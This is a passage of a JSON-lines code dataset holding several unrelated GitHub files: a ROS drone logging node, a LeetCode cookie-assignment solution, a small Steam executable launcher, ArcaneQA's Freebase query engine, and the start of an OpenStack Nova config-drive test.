std_msgs.msg import Float32\nfrom std_srvs.srv import Trigger, TriggerResponse\nfrom droneinfo.srv import StartLogging, StartLoggingResponse\n\nimport time\nimport csv\nfrom quaternion import *\n\n\nclass droneinfo:\n def __init__(self):\n # Publish to the MarkerLocator's original topic\n self.gsd = rospy.Publisher(\"/droneinfo/gsd\", Float32, queue_size=10)\n self.currGSD = 0\n\n # Parameters depending on camera\n self.fov = 1.3962634\n self.pixel_width = 800\n\n # Service handler\n self.s_start_log = rospy.Service(\"/droneinfo/start_logging\", StartLogging, self.startLogHandler, buff_size=10)\n self.s_stop_log = rospy.Service(\"/droneinfo/stop_logging\", Trigger, self.stopLogHandler, buff_size=10)\n\n # loggin parameters\n self.timeStart = rospy.get_time()\n self.logging = False\n self.userSetLogName = \"\"\n rospack = rospkg.RosPack()\n self.path = rospack.get_path('droneinfo')\n self.logfile = self.path + \"/logs/log\" + \"_\" + self.userSetLogName + time.strftime(\n \"%d_%m_%Y\") + \"_\" + time.strftime(\"%H_%M_%S\") + \".csv\"\n # log in memory\n self.loglist = []\n\n # Subscribe to get height\n self.image_sub = rospy.Subscriber(\"/mavros/local_position/pose\", PoseStamped, self.callback)\n\n # need to use function to get latest changes set from services. Also updates self.logname\n def updateLogName(self):\n self.logfile = self.path + \"/logs/log\" + \"_\" + self.userSetLogName + time.strftime(\n \"%d_%m_%Y\") + \"_\" + time.strftime(\"%H_%M_%S\") + \".csv\"\n\n def startLogHandler(self, req):\n # if req != empty, change logfile name\n if req.logname != \"\":\n self.userSetLogName = req.logname + \"_\"\n\n # update logname for correct time and custom tag\n self.updateLogName()\n self.logging = True\n self.loglist = []\n return StartLoggingResponse(success=True, message=\"Logging Started\")\n\n def stopLogHandler(self, req):\n\n # always stop logging\n self.logging = False\n\n if len(self.loglist) == 0:\n print(\"Log is empty, nothing to save\")\n return TriggerResponse(success=False, message=\"Log is empty, nothing to save\")\n\n with open(self.logfile, 'w') as csvfile:\n spamwriter = csv.writer(csvfile, delimiter=',')\n for val in self.loglist:\n spamwriter.writerow(val)\n\n # clear log in memory\n self.loglist = []\n return TriggerResponse(success=True, message=\"Logging Stopped and saved to file: \" + self.logfile)\n\n def callback(self, data):\n height = data.pose.position.z\n self.currGSD = getGSD(height, self.fov, self.pixel_width)\n self.gsd.publish(self.currGSD)\n\n # save to log file in memory\n if self.logging:\n q = data.pose.orientation\n _, _, yaw = quaternion_to_euler_angle(q.w, q.x, q.y, q.z)\n deltaT = rospy.get_time() - self.timeStart\n \n data = [deltaT, data.pose.position.x, data.pose.position.y, data.pose.position.z, yaw]\n self.loglist.append(data)\n\n def shutdownHandler(self):\n self.stopLogHandler(None)\n\n # shutdown services\n self.s_start_log.shutdown()\n self.s_stop_log.shutdown()\n print(\"Shutting down\")\n\n\ndef main():\n rospy.init_node('droneinfo', anonymous=True)\n rospy.sleep(1)\n\n di = droneinfo()\n\n rospy.on_shutdown(di.shutdownHandler)\n\n rospy.spin()\n\nif __name__ == '__main__':\n main()\n","repo_name":"Crowdedlight/ROVI2","sub_path":"Excercises/Miniproject3/Olliver/catkin_ws/src/droneinfo/src/droneinfo/infonode.py","file_name":"infonode.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"16555869722","text":"class Solution(object):\n def findContentChildren(self, g, s):\n \"\"\"\n :type g: List[int]\n :type s: List[int]\n :rtype: int\n \"\"\"\n # 가장 큰 친구에게 가장 큰 쿠키를 준다\n # 안맞으면 패스, 작은 친구로 넘어감\n # 맞으면 주고 카운트\n # 만약 다 없어지면 오류 날 수 있으니 break 걸어줌\n g.sort(reverse=True)\n s.sort()\n result = 0\n for i in g:\n if not s:\n break\n if i <= s[-1]:\n s.pop()\n result += 1\n return result","repo_name":"junhong625/MOCOCO","sub_path":"[15주차] 그리디 알고리즘/[LeetCode 455번] Assign Cookies/홍영민_sort_for.py","file_name":"홍영민_sort_for.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"37943677799","text":"import os\nfrom tkinter import *\nfrom tkinter import filedialog\nprint(\"\"\"\n\n█▀ ▀█▀ █▀▀ ▄▀█ █▀▄▀█   █▀▀ ▀▄▀ █▀█ █░░ █▀█ █▀█ █▀▀ █▀█\n▄█ ░█░ ██▄ █▀█ █░▀░█   ██▄ █░█ █▀▀ █▄▄ █▄█ █▀▄ ██▄ █▀▄\n\"\"\")\nprint(\"Steam Explorer by MrModer#1144\")\nprint(\"Используй в Spacewar под названием SteamworksExample.exe\")\nprint(\"Закрой это окно, чтобы выйти ;)\")\ndef browseFiles():\n filename = filedialog.askopenfilename(initialdir = \"/\",\n title = \"Steam Explorer\",\n filetypes = ((\"EXE files\",\n \"*.exe*\"),\n (\"all files\",\n \"*.*\")))\n \n os.system(f'\"{filename}\"')\n\nwhile True:\n browseFiles()\n","repo_name":"MrM0der/steamexplorer","sub_path":"steamexplorer.py","file_name":"steamexplorer.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"34893736908","text":"import random\nimport re\nimport time\nimport functools\nimport json\nfrom pathlib import Path\nfrom collections import defaultdict\nfrom typing import List, Dict\n\nfrom allennlp.common.util import START_SYMBOL, END_SYMBOL\nfrom allennlp.semparse import util\nfrom utils.sparql_cache import SparqlCache\n\n\npath = str(Path(__file__).parent.absolute())\n\n\ndef timer(func):\n @functools.wraps(func)\n def wrapper_timer(*args, **kwargs):\n tic = time.perf_counter()\n value = func(*args, **kwargs)\n toc = time.perf_counter()\n elapsed_time = toc - tic\n print(f\"Elapsed time: {elapsed_time:0.4f} seconds for {func.__name__}\")\n return value\n return wrapper_timer\n\n\ndef get_vocab(dataset: str):\n if dataset == \"grail\":\n with open(path + '/../../vocabulary/grailqa.json') as f:\n data = json.load(f)\n return set(data[\"relations\"]), set(data[\"classes\"]), set(data[\"attributes\"])\n elif dataset == \"graphq\":\n with open(path + '/../../vocabulary/gq1.json') as f:\n data = json.load(f)\n return set(data[\"relations\"]), set(data[\"classes\"]), set(data[\"attributes\"])\n elif dataset == \"webq\":\n # with open(path + '/vocab_files/webq.json') as f:\n with open(path + '/../../vocabulary/webq_full.json') as f:\n data = json.load(f)\n return set(data[\"relations\"]), set(data[\"classes\"]), set(data[\"attributes\"]), set(data[\"tc_attributes\"]), set(\n data[\"cons_attributes\"]), data[\"cons_ids\"]\n elif dataset == \"cwq\":\n pass\n\n\ndef get_ontology(dataset: str):\n class_hierarchy = defaultdict(lambda: [])\n class_out_edges = defaultdict(lambda: set())\n class_in_edges = defaultdict(lambda: set())\n relation_domain = {}\n relation_range = {}\n date_attributes = set()\n numerical_attributes = set()\n if dataset == \"grail\":\n fb_type_file = path + \"/../../ontology/commons/fb_types\"\n fb_roles_file = path + \"/../../ontology/commons/fb_roles\"\n elif dataset == \"graphq\":\n fb_type_file = path + \"/../../ontology/fb_types\"\n fb_roles_file = path + \"/../../ontology/fb_roles\"\n\n else: # webq does not need these information\n return class_out_edges, class_in_edges, relation_domain, relation_range, date_attributes, numerical_attributes\n\n with open(fb_type_file) as f:\n for line in f:\n fields = line.split()\n if fields[2] != \"common.topic\":\n class_hierarchy[fields[0]].append(fields[2])\n\n with open(fb_roles_file) as f:\n for line in f:\n fields = line.split()\n relation_domain[fields[1]] = fields[0]\n relation_range[fields[1]] = fields[2]\n\n class_out_edges[fields[0]].add(fields[1])\n class_in_edges[fields[2]].add(fields[1])\n\n if fields[2] in ['type.int', 'type.float']:\n numerical_attributes.add(fields[1])\n elif fields[2] == 'type.datetime':\n date_attributes.add(fields[1])\n\n for c in class_hierarchy:\n for c_p in class_hierarchy[c]:\n class_out_edges[c].update(class_out_edges[c_p])\n class_in_edges[c].update(class_in_edges[c_p])\n\n return class_out_edges, class_in_edges, relation_domain, relation_range, date_attributes, numerical_attributes\n\n\nclass KBEngine:\n def __init__(self, dataset='grail', MAX_VARIABLES_NUM=20):\n self._dataset = dataset\n if dataset in [\"graphq\", \"grail\"]:\n self._relations, self._classes, self._attributes = get_vocab(dataset)\n elif dataset == \"webq\":\n self._relations, self._classes, self._attributes, self._tc_attributes, self._cons_attributes, self._cons_ids = get_vocab(\n dataset)\n\n if dataset == \"grail\":\n with open(path + '/../../ontology/domain_dict', 'r') as f:\n self._domain_dict = json.load(f)\n with open(path + '/../../ontology/domain_info', 'r') as f:\n self._domain_info = json.load(f)\n self._class_out, self._class_in, self._relation_d, self._relation_r, self._date_attributes, \\\n self._numerical_attributes = get_ontology(dataset)\n self._date_attributes = self._date_attributes.intersection(self._attributes)\n self._numerical_attributes = self._numerical_attributes.intersection(self._attributes)\n self._cache = SparqlCache(dataset)\n self.training = False\n self.max_variables_num = MAX_VARIABLES_NUM\n\n def get_vocab(self):\n return self._relations, self._classes, self._attributes\n\n def set_training(self, training): # call it at the beginning of each forward pass\n self.training = training\n\n def process_value(self, value):\n data_type = value.split(\"^^\")[1].split(\"#\")[1]\n if data_type not in ['integer', 'float', 'double', 'dateTime']:\n value = f'\"{value.split(\"^^\")[0] + \"-08:00\"}\"^^<{value.split(\"^^\")[1]}>'\n # value = value.split(\"^^\")[0] + '-08:00^^' + value.split(\"^^\")[1]\n else:\n value = f'\"{value.split(\"^^\")[0]}\"^^<{value.split(\"^^\")[1]}>'\n\n return value\n\n def get_relations_for_variables(self, entities, reverse=False, add_noise=False):\n '''\n The most straightforward way is obviously get those relations using SPARQL query, but I am not sure about\n the efficiency of doing this.\n Also, for debug purpose, we can also just simply return all the relations in Freebase to make sure the whole\n flow works.\n :param entities: A set of entities\n :param reverse: True indicates outgoing relations, while False indicates ingoing relations\n :return: All adjacent relations of those entities\n '''\n\n # if TC:\n # tc_relations = set()\n # for r in self._relations:\n # if r.__contains__(\".from\"):\n # tc_relations.add(r)\n # return tc_relations\n\n # print(\"get relations for: {} entities\".format(len(entities)))\n rtn = set()\n # TODO: remove this constraint, this is only for debugging.\n for entity in list(entities)[:20]:\n try:\n if reverse:\n rtn.update(self._cache.get_out_relations(entity).intersection(self._relations))\n else:\n rtn.update(self._cache.get_in_relations(entity).intersection(self._relations))\n except Exception:\n # print(\"entity:\", entity)\n pass\n # print(entities)\n # print(\"done getting relations\")\n\n if self.training and add_noise:\n if not self._dataset == 'grail':\n rtn.update(random.sample(self._relations, 100))\n elif len(self._domains) > 0:\n if random.random() > 0.5:\n vocab = set()\n for d in self._domains:\n vocab.update(self._domain_dict[d])\n # rtn = rtn.intersection(vocab)\n if len(vocab) > 100:\n rtn.update(random.sample(vocab, 100))\n else:\n rtn.update(vocab)\n\n return rtn\n\n def get_relations_for_class(self, class_name, reverse=False, add_noise=False):\n if reverse:\n return self._class_out[class_name].intersection(self._relations)\n else:\n return self._class_in[class_name].intersection(self._relations)\n\n def get_attributes_for_variables(self, entities, add_noise=False):\n rtn = set()\n # TODO: remove this constraint, this is only for debugging.\n for entity in list(entities)[:20]:\n try:\n rtn.update(self._cache.get_out_relations(entity).intersection(self._attributes))\n except Exception:\n # print(\"entity:\", entity)\n pass\n # print(entities)\n # print(\"done getting relations\")\n\n if self.training and add_noise:\n if len(self._attributes) > 100:\n rtn.update(random.sample(self._attributes, 100))\n else:\n rtn.update(self._attributes)\n\n return rtn\n\n def get_tc_attributes_for_variables(self, entities, add_noise=False):\n rtn = set()\n # TODO: remove this constraint, this is only for debugging.\n for entity in list(entities)[:20]:\n try:\n rtn.update(self._cache.get_out_relations(entity).intersection(self._tc_attributes))\n except Exception:\n # print(\"entity:\", entity)\n pass\n\n if self.training and add_noise:\n if len(self._tc_attributes) > 100:\n rtn.update(random.sample(self._tc_attributes, 100))\n else:\n rtn.update(self._tc_attributes)\n\n return rtn\n\n def get_cons_attributes_for_variables(self, entities, add_noise=False):\n rtn = set()\n # TODO: remove this constraint, this is only for debugging.\n for entity in list(entities)[:20]:\n try:\n rtn.update(self._cache.get_out_relations(entity).intersection(self._cons_attributes))\n except Exception:\n # print(\"entity:\", entity)\n pass\n\n if self.training and add_noise:\n if len(self._cons_attributes) > 100:\n rtn.update(random.sample(self._cons_attributes, 100))\n else:\n rtn.update(self._cons_attributes)\n\n return rtn\n\n def get_attributes_for_value(self, value, add_noise=False, use_ontology=True):\n rtn = set()\n\n if use_ontology:\n if value.__contains__(\"#float\") or value.__contains__(\"#integer\") or value.__contains__(\"#double\"):\n rtn.update(self._numerical_attributes)\n else:\n rtn.update(self._date_attributes)\n else: # retrieve based on KB facts\n data_type = value.split(\"#\")[1]\n if data_type not in ['integer', 'float', 'double', 'dateTime']:\n value = f'\"{value.split(\"^^\")[0] + \"-08:00\"}\"^^<{value.split(\"^^\")[1]}>'\n else:\n value = f'\"{value.split(\"^^\")[0]}\"^^<{value.split(\"^^\")[1]}>'\n\n rtn.update(self._cache.get_in_attributes(value).intersection(self._attributes))\n\n if self.training and add_noise:\n if len(self._attributes) > 100:\n rtn.update(random.sample(self._attributes, 100))\n else:\n rtn.update(self._attributes)\n\n return rtn\n\n def get_attributes_for_class(self, class_name, add_noise=False):\n return self._class_out[class_name].intersection(self._attributes)\n\n def is_intersectant(self, derivation1, derivation2):\n return self._cache.is_intersectant(derivation1, derivation2)\n\n def get_reachable_classes(self, derivations, answer_types):\n reachable_classes = set()\n for a in answer_types:\n flag = True\n for d in derivations:\n if not self._cache.is_reachable(d, a):\n flag = False\n break\n if flag:\n reachable_classes.add(a)\n\n return reachable_classes\n\n def get_classes_for_variables(self, entities, add_noise=False):\n # print(\"get classes for: {} entities\".format(len(entities)))\n rtn = set()\n # TODO: remove this constraint, this is only for debugging.\n for entity in list(entities)[:20]:\n rtn.update(set(self._cache.get_types(entity)).intersection(self._classes))\n\n if self.training and add_noise:\n if not self._dataset == \"grail\":\n if len(self._classes) > 100:\n rtn.update(random.sample(self._classes, 100))\n else:\n rtn.update(self._classes)\n elif len(self._domains) > 0:\n if random.random() > 0.5:\n vocab = set()\n for d in self._domains:\n vocab.update(self._domain_dict[d])\n # rtn = rtn.intersection(vocab)\n if len(vocab) > 100:\n rtn.update(random.sample(vocab, 100))\n else:\n rtn.update(vocab)\n\n return rtn\n\n # return classes\n\n def get_constraints_for_variables(self, entities, cons_attribute):\n rtn = set()\n # TODO: remove this constraint, this is only for debugging.\n for entity in list(entities)[:20]:\n rtn.update(set(self._cache.get_out_entities(entity, cons_attribute)).intersection(self._cons_ids))\n\n return rtn\n\n def execute_AND(self, arg1, arg2):\n if not isinstance(arg2, set):\n rtn = set()\n # TODO: this is only for debug\n for entity in list(arg1)[:20]:\n if arg2 in self._cache.get_types(entity):\n rtn.add(entity)\n return rtn\n else:\n return arg1.intersection(arg2)\n\n def execute_JOIN(self, arg1, arg2):\n # print(\"execute JOIN for: {} entities\".format(len(arg1)))\n rtn = set()\n if isinstance(arg1, str):\n value = arg1\n data_type = value.split(\"^^\")[1].split(\"#\")[1]\n if data_type not in ['integer', 'float', 'double', 'dateTime']:\n value = f'\"{value.split(\"^^\")[0] + \"-08:00\"}\"^^<{value.split(\"^^\")[1]}>'\n # value = value.split(\"^^\")[0] + '-08:00^^' + value.split(\"^^\")[1]\n else:\n value = f'\"{value.split(\"^^\")[0]}\"^^<{value.split(\"^^\")[1]}>'\n\n rtn.update(self._cache.get_in_entities_for_literal(value, arg2))\n else:\n if arg2[-4:] == '_inv':\n # TODO: this is only for debug\n for entity in list(arg1)[:20]:\n # print(entity, arg2[1])\n rtn.update(self._cache.get_out_entities(entity, arg2[:-4]))\n else:\n # TODO: this is only for debug\n for entity in list(arg1)[:20]:\n # print(arg2, entity)\n rtn.update(self._cache.get_in_entities(entity, arg2))\n # print(\"done executing JOIN\")\n return rtn\n\n def execute_TC(self, arg1, arg2, arg3):\n # TODO: apply time constraint (not urgent)\n return arg1\n\n def execute_Comparative(self, arg1, arg2, comparator):\n assert isinstance(arg1, str) # it must be a value instead of a set of entities\n value = arg1\n if comparator == 'le':\n comp = '<='\n elif comparator == 'lt':\n comp = '<'\n elif comparator == 'ge':\n comp = '>='\n elif comparator == 'gt':\n comp = '>'\n\n data_type = value.split(\"^^\")[1].split(\"#\")[1]\n if data_type not in ['integer', 'float', 'double', 'dateTime']:\n value = f'\"{value.split(\"^^\")[0] + \"-08:00\"}\"^^<{value.split(\"^^\")[1]}>'\n # value = value.split(\"^^\")[0] + '-08:00^^' + value.split(\"^^\")[1]\n else:\n value = f'\"{value.split(\"^^\")[0]}\"^^<{value.split(\"^^\")[1]}>'\n\n rtn = set()\n rtn.update(self._cache.get_entities_cmp(value, arg2, comp))\n\n return rtn\n\n # @timer\n def get_admissible_actions(self, predictions, variables, num_topics, arg_mode=False, arg_variables=set(),\n arg_class=None,\n add_noise=False,\n domains=None,\n answer_types=None,\n derivations=None,\n initial_map=None):\n \"\"\"\n This helps to get the admissible actions of a decoding step given predictions from previous 2 steps\n :param predictions:\n :param variables:\n :param num_topics: number of topic entities (values)\n :param arg_mode: indicate now it's inside a superlative function\n :return:\n \"\"\"\n\n if domains is not None and len(domains) > 0:\n assert self._dataset == 'grail'\n self._domains = domains\n else:\n self._domains = []\n\n admissible_constants = []\n admissible_variables = []\n # computing a score for all vocab items is intractable, so we use a small set of items to represent the\n # entire vocab\n representative_vocab_items = []\n\n if len(predictions) == 1:\n two_tokens = [None, predictions[0]]\n else:\n two_tokens = predictions[-2:]\n\n token = two_tokens[1]\n if token == START_SYMBOL:\n admissible_constants.append('(')\n elif token in [END_SYMBOL, \"@@UNKNOWN@@\", \"@@PADDING@@\"]:\n admissible_constants.append(END_SYMBOL)\n elif token == '(':\n if two_tokens[0][0] != '#' and two_tokens[0] not in self._classes:\n if two_tokens[0] != START_SYMBOL:\n if self._dataset in ['graphq', 'grail']:\n admissible_constants.extend(\n ['AND', 'JOIN', 'ARGMAX', 'ARGMIN', 'COUNT', 'lt', 'le', 'gt', 'ge'])\n elif self._dataset == \"webq\":\n admissible_constants.extend(['AND', 'JOIN', 'TC', 'CONS', 'ARGMAX', 'ARGMIN'])\n elif self._dataset == \"cwq\":\n admissible_constants.extend(['AND', 'JOIN', 'TC', 'CONS', 'ARGMAX', 'ARGMIN', 'lt', 'gt'])\n\n else: # The first function\n if self._dataset in ['graphq', 'grail']:\n if len(variables) == 0:\n admissible_constants.extend(['ARGMAX', 'ARGMIN'])\n # for grailqa, it could be (ARGMAX class relation)\n else:\n admissible_constants.extend(\n ['JOIN', 'lt', 'le', 'gt', 'ge', 'ARGMAX', 'ARGMIN'])\n elif self._dataset == \"webq\":\n admissible_constants.extend(['JOIN'])\n elif self._dataset == \"cwq\":\n admissible_constants.extend(['JOIN', 'lt', 'gt'])\n\n elif token == ')':\n if predictions[-3] == 'COUNT':\n admissible_constants.append(END_SYMBOL) # COUNT function is never nested\n elif arg_mode and two_tokens[0] in self._attributes:\n admissible_constants.append(END_SYMBOL) # ARG function is never nested\n else:\n if len(variables) < self.max_variables_num:\n admissible_constants.extend([END_SYMBOL, '('])\n else:\n admissible_constants.append(END_SYMBOL) # force to stop\n elif token in ['AND', 'COUNT', 'TC', 'CONS']:\n for i in range(len(variables)):\n if isinstance(variables[i], set):\n if i >= num_topics: # can only be applied to intermediate executions\n admissible_variables.append(i)\n elif token == 'JOIN':\n if self._dataset in [\"graphq\", \"grail\"]:\n for i in range(len(variables)): # JOIN accepts both entities and literals\n admissible_variables.append(i)\n elif self._dataset == \"webq\":\n for i in range(len(variables)):\n if isinstance(variables[i], str) and not re.match(\"[\\d]{4}\", variables[i]):\n admissible_variables.append(i)\n elif isinstance(variables[i], set):\n admissible_variables.append(i)\n\n elif token in ['ARGMAX', 'ARGMIN']:\n for i in range(len(variables)):\n if isinstance(variables[i], set):\n if i >= num_topics:\n admissible_variables.append(i)\n if len(admissible_variables) == 0 and self._dataset == \"grail\":\n if self.training:\n admissible_constants.extend(self._classes)\n else:\n admissible_constants.extend(answer_types)\n elif len(admissible_variables) == 0 and self._dataset == \"graphq\":\n for c in self._classes:\n if c[:7] != 'common.' and c[:5] != 'type.' and c[:3] != 'kg.' and c[:5] != 'user.' \\\n and c[:5] != 'base.':\n admissible_constants.append(c)\n # else the first argument should not be a class\n elif token in ['le', 'lt', 'ge', 'gt']:\n for i in range(len(variables)):\n if isinstance(variables[i], str):\n admissible_variables.append(i)\n elif token == 'NOW':\n admissible_constants.append(')')\n elif token[0] == '#':\n if two_tokens[0] == 'AND':\n if self._dataset in ['graphq', 'grail']:\n if self.training or self._dataset == 'graphq':\n admissible_constants.extend(\n self.get_classes_for_variables(variables[int(token[1:])], add_noise=add_noise))\n\n # admissible_constants.extend(\n # self.get_classes_for_variables(variables[int(token[1:])], add_noise=add_noise).intersection(\n # set(answer_types)))\n else:\n try:\n derivations_list = []\n for k in derivations[int(token[1:])]:\n if len(derivations[int(token[1:])][k]) == 0: # no derivation info\n continue\n start = variables[k]\n if isinstance(start, set):\n derivations_list.append(\n [':' + list(start)[0], derivations[int(token[1:])][k][0]])\n else:\n value = self.process_value(start)\n if len(derivations[int(token[1:])][k]) == 2:\n derivations_list.append([value, derivations[int(token[1:])][k][0],\n derivations[int(token[1:])][k][1]])\n else:\n derivations_list.append([value, derivations[int(token[1:])][k][0]])\n\n admissible_constants.extend(\n self.get_reachable_classes(derivations_list, answer_types))\n\n except Exception:\n admissible_constants.extend(\n self.get_classes_for_variables(variables[int(token[1:])],\n add_noise=add_noise).intersection(set(answer_types)))\n\n elif self._dataset == 'webq':\n admissible_constants.extend(\n self.get_classes_for_variables(variables[int(token[1:])], add_noise=add_noise))\n\n admissible_v = []\n if isinstance(variables[int(token[1:])], set):\n for i in range(len(variables)):\n if i != int(token[1:]):\n if isinstance(variables[i], set):\n if i >= num_topics:\n # if len(variables[i].intersection(variables[int(token[1:])])) > 0:\n # currently only support path sub-queries intersection\n try:\n assert len(derivations[i]) == 1\n derivation_1 = []\n for k in derivations[i]:\n start = variables[k]\n if isinstance(start, set):\n derivation_1.append(':' + list(start)[0])\n else:\n value = self.process_value(start)\n derivation_1.append(value)\n derivation_1.append(derivations[i][k][0])\n if len(derivations[i][k]) == 2:\n derivation_1.append(derivations[i][k][1])\n assert len(derivations[int(token[1:])]) == 1\n derivation_2 = []\n for k in derivations[int(token[1:])]:\n start = variables[k]\n if isinstance(start, set):\n derivation_2.append(':' + list(start)[0])\n else:\n value = self.process_value(start)\n derivation_2.append(value)\n derivation_2.append(derivations[int(token[1:])][k][0])\n if len(derivations[int(token[1:])][k]) == 2:\n derivation_2.append(derivations[int(token[1:])][k][1])\n if self.is_intersectant(derivation_1, derivation_2):\n admissible_v.append(i)\n except Exception:\n if len(variables[i].intersection(variables[int(token[1:])])) > 0:\n admissible_v.append(i)\n admissible_variables.extend(admissible_v)\n elif two_tokens[0] in ['JOIN']:\n if isinstance(variables[int(token[1:])], str): # literal\n if self._dataset in [\"graphq\", \"grail\"]:\n admissible_constants.extend(\n self.get_attributes_for_value(variables[int(token[1:])], add_noise=add_noise,\n use_ontology=False)\n )\n elif self._dataset == \"webq\":\n admissible_constants.append(\"sports.sports_team_roster.number\")\n else:\n admissible_constants.extend(\n self.get_relations_for_variables(variables[int(token[1:])], add_noise=add_noise))\n admissible_constants.extend(map(lambda x: x + '_inv',\n self.get_relations_for_variables(variables[int(token[1:])],\n reverse=True,\n add_noise=add_noise)))\n elif two_tokens[0] in ['le', 'lt', 'ge', 'gt']:\n assert isinstance(variables[int(token[1:])], str)\n admissible_constants.extend(\n self.get_attributes_for_value(variables[int(token[1:])], add_noise=add_noise)\n )\n elif two_tokens[0] in ['ARGMAX', 'ARGMIN']:\n admissible_constants.extend(\n self.get_relations_for_variables(variables[int(token[1:])], reverse=True, add_noise=add_noise))\n admissible_constants.extend(map(lambda x: x + '_inv',\n self.get_relations_for_variables(variables[int(token[1:])],\n add_noise=add_noise)))\n admissible_constants.extend(\n self.get_attributes_for_variables(variables[int(token[1:])], add_noise=add_noise))\n elif two_tokens[0] == 'COUNT':\n admissible_constants.extend([')'])\n elif two_tokens[0] == 'TC':\n assert self._dataset in [\"webq\", \"cwq\"]\n admissible_constants.extend(\n self.get_tc_attributes_for_variables(variables[int(token[1:])], add_noise=add_noise))\n elif two_tokens[0] == \"CONS\":\n assert self._dataset in [\"webq\", \"cwq\"]\n admissible_constants.extend(\n self.get_cons_attributes_for_variables(variables[int(token[1:])], add_noise=add_noise))\n elif two_tokens[0][0] == '#': # (AND #1 #2)\n admissible_constants.extend([')'])\n else:\n if self._dataset in [\"graphq\", \"grail\"]:\n print(\"Unexpected:\", two_tokens[0])\n elif self._dataset == \"webq\":\n assert isinstance(variables[int(token[1:])], str)\n assert two_tokens[0] in self._tc_attributes\n admissible_constants.append(')')\n elif self._dataset in [\"graphq\", \"grail\"] and token in self._attributes:\n admissible_constants.append(')')\n elif self._dataset in [\"webq\", \"cwq\"] and token in self._tc_attributes and len(predictions) > 2 and predictions[\n -3] == 'TC':\n # Actually len(predictions) should always be at least 3 here, but at the early stage of beam search,\n # it's possible to include some illegal actions to fill the beam size\n for i in range(len(variables)):\n if isinstance(variables[i], str):\n if re.match(\"[\\d]{4}\", variables[i]): # year\n admissible_variables.append(i)\n if len(admissible_variables) == 0:\n admissible_constants.append('NOW')\n elif self._dataset in [\"webq\", \"cwq\"] and token in self._cons_attributes and len(predictions) > 2 and \\\n predictions[-3] == 'CONS':\n admissible_constants.extend(self.get_constraints_for_variables(variables[int(predictions[-2][1:])], token))\n # admissible_constants.extend(self._cons_ids)\n elif self._dataset in [\"webq\", \"cwq\"] and token in self._cons_ids:\n admissible_constants.append(')')\n elif token in self._relations and token in self._attributes:\n # for cwq and webq, it's possible to have overlap between attributes and relations\n admissible_constants.append(')')\n elif token in self._relations or token.replace(\"_inv\", '') in self._relations:\n if arg_mode:\n if arg_class is not None:\n admissible_constants.extend(self.get_attributes_for_class(arg_class, add_noise=add_noise))\n\n admissible_constants.extend(\n self.get_relations_for_class(arg_class, reverse=True, add_noise=add_noise))\n admissible_constants.extend(\n map(lambda x: x + '_inv',\n self.get_relations_for_class(arg_class, reverse=False, add_noise=add_noise))\n )\n else:\n admissible_constants.extend(\n self.get_attributes_for_variables(arg_variables, add_noise=add_noise))\n\n admissible_constants.extend(\n self.get_relations_for_variables(arg_variables, reverse=True, add_noise=add_noise))\n\n admissible_constants.extend(map(lambda x: x + '_inv',\n self.get_relations_for_variables(arg_variables,\n add_noise=add_noise)))\n else:\n admissible_constants.extend([')'])\n elif self._dataset in [\"webq\", 'cwq'] and token in self._attributes:\n admissible_constants.append(')')\n elif token in self._classes:\n # I made a change to datareader, now variable is forced to be precede class, so the following\n # doesn't make sense any more.\n # admissible_variables.extend([i for i in range(len(variables))])\n if two_tokens[0] not in ['ARGMAX', 'ARGMIN']:\n admissible_constants.extend([')'])\n else: # This is not gonna happen for webq or cwq\n assert self._dataset in [\"graphq\", \"grail\"]\n admissible_constants.extend(self.get_relations_for_class(token, reverse=True, add_noise=add_noise))\n admissible_constants.extend(self.get_attributes_for_class(token, add_noise=add_noise))\n\n if self.training:\n if len(admissible_constants) == 0 and len(admissible_variables) == 0:\n admissible_constants.append(END_SYMBOL) # In this way we can get infinite loss we want\n\n for p in predictions:\n if p[0] == \"#\":\n if int(p[1:]) in admissible_variables:\n admissible_variables.remove(int(p[1:])) # TODO: for webq, this may not be true\n if int(p[1:]) < num_topics: # remove variables of the same mention\n mention = initial_map[int(p[1:])][1]\n to_remove = []\n for v in admissible_variables:\n if v < num_topics and initial_map[v][1] == mention:\n to_remove.append(v)\n for v in to_remove:\n admissible_variables.remove(v)\n\n\n if len(admissible_variables) > 0:\n admissible_constants = []\n\n\n return admissible_constants, admissible_variables, representative_vocab_items","repo_name":"dki-lab/ArcaneQA","sub_path":"source/utils/kb_engine.py","file_name":"kb_engine.py","file_ext":"py","file_size_in_byte":33711,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"28563220097","text":"import datetime\n\nimport mock\nfrom oslo_config import cfg\nfrom oslo_serialization import jsonutils\nimport webob\n\nfrom nova.api.openstack.compute import extension_info\nfrom nova.api.openstack.compute.legacy_v2 import servers as servers_v2\nfrom nova.api.openstack.compute import servers as servers_v21\nfrom nova.api.openstack import extensions\nfrom nova.compute import api as compute_api\nfrom nova.compute import flavors\nfrom nova import exception\nfrom nova import objects\nfrom nova import test\nfrom nova.tests.unit.api.openstack import fakes\nfrom nova.tests.unit import fake_instance\nfrom nova.tests.unit.image import fake\nfrom nova.tests import uuidsentinel as uuids\n\nCONF = cfg.CONF\n\n\nclass ConfigDriveTestV21(test.TestCase):\n base_url = '/v2/fake/servers/'\n\n def _setup_wsgi(self):\n self.app = fakes.wsgi_app_v21(init_only=('servers', 'os-config-drive'))\n\n def setUp(self):\n super(ConfigDriveTestV21, self).setUp()\n fakes.stub_out_networking(self)\n fakes.stub_out_rate_limiting(self.stubs)\n fake.stub_out_image_service(self)\n self._setup_wsgi()\n\n def test_show(self):\n self.stub_out('nova.db.instance_get',\n fakes.fake_instance_get())\n self.stub_out('nova.db.instance_get_by_uuid',\n fakes.fake_instance_get())\n req = webob.Request.blank(self.base_url + uuids.sentinel)\n req.headers['Content-Type'] = 'application/json'\n response = req.get_response(self.app)\n self.assertEqual(response.status_int, 200)\n res_dict = jsonutils.loads(response.body)\n self.assertIn('config_drive', res_dict['server'])\n\n @mock.patch('nova.compute.api.API.get_all')\n def test_detail_servers(self, mock_get_all):\n # NOTE(danms): Orphan these fakes (no context) so that we\n # are sure that the API is requesting what it needs without\n # having to lazy-load.\n mock_get_all.return_value = objects.InstanceList(\n objects=[fakes.stub_instance_obj(ctxt=None, id=1),\n 